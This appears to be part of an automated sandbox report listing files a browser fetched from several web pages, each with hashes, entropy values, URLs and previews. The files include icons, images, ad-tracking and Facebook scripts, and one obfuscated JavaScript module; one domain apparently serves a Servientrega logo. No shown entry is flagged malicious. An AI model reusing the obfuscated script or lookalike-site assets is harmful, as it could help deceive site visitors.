            SHA1:10F2ACF161E72FBDC18E631261C0F0A9DE04C51F
            SHA-256:C0C2438DDBF2DC191FF70846BCC30C579B71393B82C3C22C10D55AF8A242A3A0
            SHA-512:82FB50AED516CC407DC9D72630FA84223A856894CA68AAFC293C05FF511FC729875AC3339974FAE85D3A1F485A50DE297E4FF2154480FA73AD6544469CF3B209
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="27px" height="17px" viewBox="0 0 27 17" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="menu-(1)">.. <path d="M0.875252 1.61904L22.1541 1.61904C22.6373 1.61904 23.0294 1.25634 23.0294 0.809522C23.0294 0.362636 22.6372 0 22.1541 0L0.875252 0C0.392081 0 1.77376e-14 0.362704 1.77376e-14 0.809522C1.77376e-14 1.25634 0.392154 1.61904 0.875252 1.61904Z" transform="translate(3.970581 0)" id="Path" fill="#FFFFFF" stroke="none" />.. <path d="M26.117 0L0.882973 0C0.395539 0 1.77982e-14 0.362704 1.77982e-14 0.809523C1.77982e-14 1.25634 0.395613 1.61905 0.882973 1.61905L26.117 1.61905C26.6044 1.61905 27 1.25634 27 0.809523C27 0.362704 26.6044 0 26.117 0Z" transform="translate(0 8.095215)" id="Path" fill="#FFFFFF" stroke="none" />.. <path d="M18.7086 0L0.938481 0C0.420405 0 -2.79474e-14 0.362704 -2.79474e-14 0.809522C-2.79474e-14 1.25641 0.420483 1.61904 0.938481 1.61904L18.7086 1.619
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (4763), with no line terminators
            Category:downloaded
            Size (bytes):4763
            Entropy (8bit):5.817631889008602
            Encrypted:false
            SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUupl2tc:1DY0hf1bT47OIqWb1/plic
            MD5:031C500EF05CCB17EEDC0F8326E539CA
            SHA1:449EA62A38857CABB73ED473C2772012A13E21E5
            SHA-256:B75B78F684913E675B01327BE48AA1DFE1927078A3BC7566FF803757E333C601
            SHA-512:BC0795F3466F181EEBF621996693ABE679A797B440F44DD754D3FF24D46BD005F9AF5EC93E59261711D77BC9722E8C2D409456E086139D43A15CDE0B52A803D1
            Malicious:false
            Reputation:low
            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/10981864615/?random=1727397050580&cv=11&fst=1727397050580&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (5552)
            Category:dropped
            Size (bytes):66711
            Entropy (8bit):5.318187471770509
            Encrypted:false
            SSDEEP:1536:RJeUwT7hpwNCHM9ZK0BK01QYTZ02LKVsdmpyKcic1:RIT7Ds9ZKAKBYj8wKcH1
            MD5:AEAA36411B7F2550667758ACC88E3596
            SHA1:B179B2EE761A847CC7B5AD4B82BAB8AE0C0302C9
            SHA-256:85F426C220B3A6337221CDD051C2E6C64BF7FBC8BB854F9862626DABE7AF9D28
            SHA-512:E631F9DA3B0FFCB51933671A281A5580C7CB116880BFA4E961E74A7E6E05DA78E1BE480B7871154590335A04EE8C333B575885200EA09FF29C34C3892D9F7F56
            Malicious:false
            Reputation:low
            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):2455
            Entropy (8bit):4.776407386577479
            Encrypted:false
            SSDEEP:48:cUaIaLYXh0wgmHGFPYG9IE/przmUmI7E+LDUVuLmf:xTag0lRIUpUMLY
            MD5:D741920A5F7DB758D6FD1679D20ADA4E
            SHA1:A516676B75C9064896E618D18FE7CD06D8E926DB
            SHA-256:BDF2A35AAE3D41CDEE4ECC3D2433A3CAB11117801D5A82E409B9C20607927F50
            SHA-512:B5F16F1E05A7776C3FAAD5A84CBD796394E56C0790D7AE1F5CAD580C1C8324BE3EA4D7409658A22DEA22BB66C938EE58C4C7041DC0543E6D65850A4B13ED7D17
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/51.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="panama">.. <g id="Group">.. <path d="M11.5 0.393437L0.39657 0.393437L0.39657 7.475C0.39657 7.69226 0.218994 7.86844 0 7.86844L10.174 7.86844C11.1254 7.86844 11.8966 7.10336 11.8966 6.15952L11.8966 0C11.8966 0.217264 11.719 0.393437 11.5 0.393437Z" transform="translate(11.10343 7.0815625)" id="Path" fill="#F5F5F5" stroke="none" />.. <path d="M0.39657 7.475L11.5 7.475L11.5 0.393437C11.5 0.176173 11.6776 0 11.8966 0L1.72253 0C0.771174 4.4567e-05 0 0.765126 0 1.70897L0 7.86844C0 7.65117 0.177576 7.475 0.39657 7.475Z" id="Path" fill="#F5F5F5" stroke="none" />.. </g>.. <path d="M9.77747 0L0.39657 0C0.177576 0 0 0.176173 0 0.393437L0 7.47496L11.1034 7.47496C11.3224 7.47496 11.5 7.29878 11.5 7.08152L11.5 1.70892C11.5 0.765082 10.7288 0 9.77747 0Z" transform="translate(11.5 6.1035156E
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):2838
            Entropy (8bit):4.679811325846089
            Encrypted:false
            SSDEEP:48:cZmjhJ+1uIgdV3epaQxOhd0xKOST4koIfWPAwwOHmI0Thxymx+3Kx:Y2hJ1zMaQxQd0bST47IfW4wwOHm97vxF
            MD5:705F54F66EDDFE96EE6CFB8C48C2B1E7
            SHA1:FC4F7597920E53010F518C95E4A2610FA4BF5877
            SHA-256:42CBEB652DB6C8EE78A058C7BF733A600E3EA59868CB9085E8DFBCAD7AEEBA44
            SHA-512:C5D07F972E76B67021D0022699B45065EB0EAF5F102DBFBAC1B0538ECDEAB00EB626CE273A7A26223819E23D97AC4AA5DC8C6689C1F0EEFA0786051DFAE78E65
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/ico-procesos-04.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 32</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-650.000000, -1051.000000)" id="Group-32">.. <g transform="translate(650.000000, 1051.000000)">.. <g id="Group-53" fill="#4112DD">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <g id="bullseye-2" transform="translate(13.000000, 13.000000)" fill="#FFFFFF" fill-rule="nonzero">.. <g id="bullseye">.. <path d="M25.0848975,5.17683011 L23.7799203,3.8826367 L23.7799203,0 L19.7199469,4.1702666 L19.4299772,7.47769995 L15.2249621,11.6479665 C14.9349355,11.6479665 14.7899507,11.6479665 14.499981,11.6479665 C12.9049772,11.64
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 2000x884, components 3
            Category:dropped
            Size (bytes):31358
            Entropy (8bit):4.559246866023873
            Encrypted:false
            SSDEEP:384:hffffffffffHTVIv+bTpfAFGchWsvt5OWdRZ6P1b1SJuY7lD9IbGi3wutfhWm1:LbZA4chBvtDr8P1qJDutz1
            MD5:CE6BF1E1AF646B49F338AB70881CC4F0
            SHA1:0FE95A7BDA359DCB78F0F2A8B86980A936109A05
            SHA-256:F295AAE35DE2DDAFE164E6F328284ED9E09C8B883EE516E44266BD2123653CB0
            SHA-512:B4AFF190A37E275D272232CF79C4A83502A6980BE3703D9D45277E4E955DA6927ED31F264F2EBC13368E8C0E739DC6F22DDD5EFD036027F431CD6896CE66E098
            Malicious:false
            Reputation:low
            Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.9 (Windows)" xmpMM:InstanceID="xmp.iid:FC7AA0BA4EB211EFB723AD9497B95389" xmpMM:DocumentID="xmp.did:FC7AA0BB4EB211EFB723AD9497B95389"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FC7AA0B84EB211EFB723AD9497B95389" stRef:documentID="xmp.did:FC7AA0B94EB211EFB723AD9497B95389"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):13
            Entropy (8bit):2.7773627950641693
            Encrypted:false
            SSDEEP:3:qVZPV:qzd
            MD5:C83301425B2AD1D496473A5FF3D9ECCA
            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
            Malicious:false
            Reputation:low
            URL:https://td.doubleclick.net/td/ga/rul?tid=G-ST8S2VTEC8&gacid=803119929.1727397022&gtm=45je49p0v870173400z8811039284za200zb811039284&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=894608372
            Preview:<html></html>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 800 x 850, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):52862
            Entropy (8bit):7.92993089354858
            Encrypted:false
            SSDEEP:768:r4lptayUmyKqBaI+fDVMJ+sZOXzMkZSOB9mA+xkoOWvSFiOZCOwiob:ratarpaLfsrOjMkZSI/+xxOWvkixb
            MD5:F66616C97E5316D1B83CF7BD6B160709
            SHA1:86521CF16109A1638DEE6124758F8276FA3DC396
            SHA-256:BC3493F00D4A5BE9322BB2992ED05888CEE2836DCD0A36F21C360975B9E6E9D3
            SHA-512:8CA11C8D0451A0414165D9ABFBD20A3E099F5632A7BE9ACB071916414564817D1E15F6B515E2527FA34E9343556A5FFFDA7739ABC1A30E41CBDCDEE334B1EF0E
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/logos-clientes1.png
            Preview:.PNG........IHDR... ...R.............pHYs.................sRGB.........gAMA......a.....IDATx.....%U...".FhD.. ..."..9g$G.0c....7.@T$.$Q......&....*A2...7.=_...[.NU.:..{......t.{...^k.=....N$I.$)...I.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I.f.D...&M.4....K$I....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$E3c"I.F...._../..<.........K...?%.'ON....'...?...~;.~...f.!.i...Yf.%.}....X Yh.....\0y...HR.M.?...$I5L.4i....(>....{.7y....D.z.;.....W\1..G?...=.I$...@$I.....Y...&$w.yg..+...ttB.d...K.\s.d.%.Lf...I.1..$.f.....M7..p.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):2456
            Entropy (8bit):4.700142282328592
            Encrypted:false
            SSDEEP:48:kMBD/PEzC2irDic9iiTc1iihDicaiiV3puzs6UlYTy74aDTPcblVH1ABs:P9vkOlrk3blMs
            MD5:02B4EEFF6C58E94B969BF795AE2F59FB
            SHA1:A7BACFF5ABD64C42C006A90331807969B17CB772
            SHA-256:120F347C860D19E01A47FD2046FCFC47682B94452422A9FBC987546EEC208DB5
            SHA-512:1B4BBE1C770613EFA0B8A83E7F4D69DD33850815789821C3EE4866AACBD791417833CFC8F7EF7AC1553BA96DC1428457BD38DAF13F4607E05BC6D3C1CA14ECC1
            Malicious:false
            Reputation:low
            Preview:jQuery(document).ready(function($) {..//-------------------------- STICKY MENU....//-------------------------- FUNCIONES RESPONSIVE.... var alterClass = function() {. var ww = document.body.clientWidth;. if (ww < 950) {. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");. $('.submenu-collapse').removeClass('show');. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');. $('.sub-menu-container').addClass('collapse');... } else if (ww >= 951) {. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");. $('.submenu-collapse').addClass('show');. $('.first-lvl').removeClass('collapsed');.. $('.second-lvl').removeClass('collapsed');. $('.sub-menu-container').removeClass('collapse');... }. if (ww < 769) {. $('.menu-tabs-listing').removeClass('show').addCla
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):723
            Entropy (8bit):5.176013741006285
            Encrypted:false
            SSDEEP:12:TMHd4ln5cQiYxJNHlCVnu5BQo+6QkY0MlPyMbOCsCbyP6ulMlpKGhHSKjG/:2dUn5cIxJ+4QK1Y0Oy8tbyP6shGhjj2
            MD5:F4D98F8C78FBFCBCCEBF3DDEE8C57FCD
            SHA1:CC326C8EAC2B0F090FE47CB21166EB2918AC65AB
            SHA-256:B45C8BBB431137470629CF552EC70D10150870634F3A895E9850C3809E02BCFB
            SHA-512:D1CE671E76CF356C1D8AAB4F33DAB034629D6A39B2A9E686E5EB8CB794EAEA0F24ED9AEACF6AF30CFC43212BA73D7BB64BE2C9CF56C4D610F0528BC306FB166F
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="colombia-(2)">.. <path d="M0 2.03535C0 2.98231 0.771174 3.75 1.72253 3.75L21.2775 3.75C22.2288 3.75 23 2.98235 23 2.03535L23 0L0 0L0 2.03535Z" transform="translate(0 11.25)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.767645 0 1.71465L0 7.5L23 7.5L23 1.71465C23 0.767645 22.2288 0 21.2775 0Z" id="Path" fill="#FFE15A" stroke="none" />.. <path d="M0 0L23 0L23 3.74991L0 3.74991L0 0Z" transform="translate(0 7.5)" id="Rectangle" fill="#41479B" stroke="none" />.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (35011), with no line terminators
            Category:dropped
            Size (bytes):35011
            Entropy (8bit):5.351149011565277
            Encrypted:false
            SSDEEP:768:KQz3pgM3LRubkqJpAGz7lgpoSsfUIygfWjOIOgw8gdIOZMlqgG7IUrYz1olCbzyc:K+UYhwmf
            MD5:DCC069636D17C9D29DBD7A49BD345A93
            SHA1:7AEDA79C8796B3C0D2FE08BA95694C3BEDEF3006
            SHA-256:0BF3B36A3E8420B02985FB7D980F2C2FA73AFD1E71BBD8AA04D94AE4E88900B3
            SHA-512:61F69A261378339059DFCA70C3D07C367FC1A66834F12B4CC5F254920CBE9A3A87CAFEF2B52CF45674E6341D39F5D91DFE05E59825A8CAB56567E827B87FA799
            Malicious:false
            Reputation:low
            Preview:var a25_0x165d2d=a25_0xcb96;(function(_0x155bf5,_0x5df0d9){var _0x57e96f=a25_0xcb96,_0x39e67a=_0x155bf5();while(!![]){try{var _0x152c10=-parseInt(_0x57e96f(0x18b))/0x1+-parseInt(_0x57e96f(0x1d9))/0x2*(parseInt(_0x57e96f(0x16b))/0x3)+parseInt(_0x57e96f(0x235))/0x4+parseInt(_0x57e96f(0x1c5))/0x5+parseInt(_0x57e96f(0x178))/0x6*(-parseInt(_0x57e96f(0x1e1))/0x7)+parseInt(_0x57e96f(0x1d1))/0x8+parseInt(_0x57e96f(0x1fe))/0x9*(-parseInt(_0x57e96f(0x22b))/0xa);if(_0x152c10===_0x5df0d9)break;else _0x39e67a['push'](_0x39e67a['shift']());}catch(_0xe76c12){_0x39e67a['push'](_0x39e67a['shift']());}}}(a25_0x543e,0xe09a0));import{l as a25_0x4a1112,_ as a25_0x2c66dd}from'./index-7c1edef8.js';import{r as a25_0x36c030}from'./09bf01f8ajMSD.js';import{m as a25_0x206149}from'./00b63b5cajMSD.js';var E=function(_0x7897c2,_0x3b86f6){var _0x28654e=a25_0xcb96;return E=Object['setPrototy'+_0x28654e(0x210)]||{'__proto__':[]}instanceof Array&&function(_0x1578c4,_0x1c79b9){_0x1578c4['__proto__']=_0x1c79b9;}||functio
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:RIFF (little-endian) data, Web/P image
            Category:dropped
            Size (bytes):253986
            Entropy (8bit):7.996855552619251
            Encrypted:true
            SSDEEP:6144:Aj3U0sGMdZj4YWFan/nZ/wJ5c9Uf0fhKKRdFOk75:ArUZGUZj4HO/lwJgUgNRdkc
            MD5:43690395B30E3D6CE7F55FE5D12ECC1B
            SHA1:D155BFBB7E2FB0595E9DA19800B65127EB966B84
            SHA-256:C3DC3BEE31BF61CC70120CB3F349A240BC41E530A55D3BD9BFF14F1A07024EF9
            SHA-512:229F23E01F69E27B89F9989D8120DEC351068D47B42BDBEBC7C88EEFFC8C0703FCB0345EE618278BDF626D14720B476CE5DC1B502ED8BE30940D8BFD2E3825C3
            Malicious:false
            Reputation:low
            Preview:RIFF....WEBPVP8X........W..S..VP8L..../W...@.d+l3w...C...RRBD.'....s?.:..=.wbk.@............T..d.....tM..=%zW...........wtm`.....q.Y9....z....zF....@..qx......H......8.3..1.C-.d...UU.....F...H.MBI.....<.......9...6...T..A..JL{.{O;....@..$<.W.i...X.i..T..4m....J......8...p..:.mI...$.L..&04$$..... ..-..q.j..^&....2..\..>... ..t..@...2.@...I.*.......?$..C..I.|3T`@6.(..{.I...M.<.r..f.N@.......:.....pt.xoc...i.y.....5.U/...I...5.Q5...Hz..5~.......I..aQ........+..&...e`."...'3.e...j;....<l.%Y........m.....m.j.i.W33..3...0..0.J.......pR.(.....EQ.c..{..D$*..H$.v..........6E.]..c..3.(..!.;.....H...G7.h.}3.m...Jh..I....Y.g..j#.6:@o...^. ..Q.....WX*...9.D..Z.:=.[..]..7r.._8...Q.`)"MHD..Ghou..:.,.w2.l..\.P.(.>.y9..xnT.T.\+"Y(..jNo...[.../...5.Z.W...e.&M.....?..k.I...Eh.=......Q..uW.-;.R..DHW...{...|........k..o.;=...4-Sc..8'.MQLR..s.1"$..9.8JdW.`...=......P..d6..|....0^......@...e..(..k-...(...%...L#_3E..H...L.aO..y.CoZ.Nf{T..(.. JH..x.......
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1432, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):1250708
            Entropy (8bit):7.995633865303328
            Encrypted:true
            SSDEEP:24576:56dO6Yki2fIfxK8WhaJOnfa+GpX6saNoqj+BwsFmRmpbs7CWnsv5fpnV:56g6sCAfhpzazaeAm8ZxBfpV
            MD5:2122F2798C316E9D9EBD8F82F709632A
            SHA1:137B4ECCA7DACA09E67ED42FEF5B56979F936D4D
            SHA-256:39A5DEF049C4A575ABA8556F82DE86C9FDC13BEB412484427E14F5A56B4E6FAF
            SHA-512:02D337CFFAEEE4083BD229FA94836345B149FEC5CD2A98DACDE42B6D457F52925046D5559F310EC26A7A5A227A60F581A5A6A19F0EFCB74834A7DB9E5D0BCA4D
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port3.png
            Preview:.PNG........IHDR..............j......pHYs.................sRGB.........gAMA......a....)IDATx...r.:.,F.>.\%O..'O......f...i6. ....Zk4..RcA...Z.....+.D".H$..D".H$._....).....%xF..=.}'.H[t>.O.\?......}t-..g.........x..1.o7.......g.O$.......R..X..D".H$....D....vh...m..N.....(...w5W?.......s'.....|/.sx..q..+.....=q..D.}#.>.9.o..]v.......}>...........o....n...o.....].W./u.ep?~.X.YcyNu....._?5.e..q......ZK..yf.#.....2...g.n..>q.........Z..u..m..*.}."*S.ko...?X~..............J.U.~V..g....9.2.w.s.p.......`_uN..~..^.......=>...3..n;>.W.....w#..:W...>;9;.T.m){......X.O.o.o-.......r..%.H$..D".H.Mp...-b/B.v...|..U.....T...1.q...1..q..H...48..?q..1..k...9.~..R..9C.V#......s5 ............|.>....,.mM...WD;..6^...AH.r. ..{.E..........u.....a.1........7...........<^...(..!..|<.. ."..Tc.!4v......B......wU.5..O...=.cv~..Y.U....,........T}v..\.c.T.....].... L .O5....b.....|.........c_.....Z.;=.+_r.S.|.vOF)z>.'..F.....$..D".H$........3..F.8[........{1.....g.o...\C
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 192 x 78, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):6858
            Entropy (8bit):7.9220791226157266
            Encrypted:false
            SSDEEP:192:NeafC9/UAxbNMPq2HDWgl/spt0BqG1uWJ7:NZf0/UAEPqo1l/I0UG1u8
            MD5:D7E572B3644E4BE1DC484D7951411EED
            SHA1:9792B3F4CF4AF3648A8ECCD10A6B8521F3B50F34
            SHA-256:B4EC6B7DEF6C3CC50453643C898F2B0113A9376850C733FD99604D8569C09D7B
            SHA-512:797A3F8B098FA5286FE6C8E29C614EC9265290ED9A75F4DA4347E655DB9742551AB25F3C5EE2CAC9B8156796005367394C0AFEE902D5B3E35EF1AB3A75BCC481
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/ico-vigilado.png
            Preview:.PNG........IHDR.......N.....vf......sBIT....|.d.....IDATx..Ys.X...Z.b..1.ml..'v......5]3.s5.i>.\.}/S..I.I.Mb...,6.1f.H...y.i0`.8[7.U.....H:.9.Y....`Ba?......C..&.C..&.C..&.C..&.C..&.C..&.C..&.C..&.C..&..c...l.....Z...@.4.....8.<..d2.f......t~,..&..C.......#....X,B.ep............o..(C..B.RA...l...E$.A ......b.L8.].J......."X...l..j..j..\.et:.t..B0.8...l..f...,....u..f..$......`..}.l0..7.(..H&..V..4......N......@UUh.F....`..*.Y.X...d. ......@.u8.N...bnn.,k.0..... .2....J...*.f3L&.j..dYF......a..........].(...A .....$I.........../_.D.X....f...1..:5p.........p8 I..f3..<l6....p8...`0.....css...`aa..\.'''.t:.[..\..... .2NOO....[.n.....y'.........v;\..vvv..*...(z......)X.V...!.........`........K...@.$...|>.V......1.m6.fgg...055.....d2}ty.~.\I..........f..R..I../,...t..v..h.....G.v.`,..#...ckk.N...V..R..,....}..vQ.Vqvv...|>.x<.Ie2..0....e.x... .b..P(..j.....(A.Z......q||...2..p..h..D".j..`0...]...!..t:..j...p:.x...g).........b..H$.d2.M.>.\W.a....j....Z..W.^}.-.....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):104
            Entropy (8bit):4.109719364790782
            Encrypted:false
            SSDEEP:3:c+ZoS8/ZoS8/ZoS8/ZoS8/ZoS8/ZoStkORnP8bn:c+ZoS8/ZoS8/ZoS8/ZoS8/ZoS8/ZoSts
            MD5:4CDB77C6EEA8BE25497638420BBDFEBF
            SHA1:0C227F0F9A6933485DDAA303AF7AF48FA63A01B5
            SHA-256:BBEE92A7995BC12EF45BC35ADA53BF9A0767E7D3A0EF67A44C3A8EDF6B1BCE25
            SHA-512:835D28541AB3745BA07A7694440E40706C2D5D32A8424537F700A13026C5628E6DC018DD49C75E38B977C05CAE1B347846E54B7F40BA13C99FFA8CA892F12D6D
            Malicious:false
            Reputation:low
            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSQQmT3KVpdgXk7BIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDVALr7ASBQ1PfPwC?alt=proto
            Preview:CkwKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw2RYZVOGgAKBw1QC6+wGgAKCw1PfPwCGgQIDRgB
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):5820
            Entropy (8bit):5.311325422152113
            Encrypted:false
            SSDEEP:96:cUgO1aKgO1aeVc+uggO1aYNcUgOEaKgOEaeVc+uggOEaYNcUgOXaKgOXaeVc+ugq:cJzkQHUSkdH7BkeHeok7HdvkUw
            MD5:BFF382002FBA4409F43D08EB0EA08DD9
            SHA1:F1DB8CC75830917AFB89FF81A50F37E509F1271E
            SHA-256:1BECE6C1FDC80E4C23C686EF999416941A71F97D563381ED4C01BD2530B2D9C4
            SHA-512:165388AD7BBC216B77804AFCDD32920464DFEE4B26FDCC1F380CB24E64EA35EE95B317F99CE56CADD64EDF9E55D68D273793DE9FDCFBB364E981AB41D63224F0
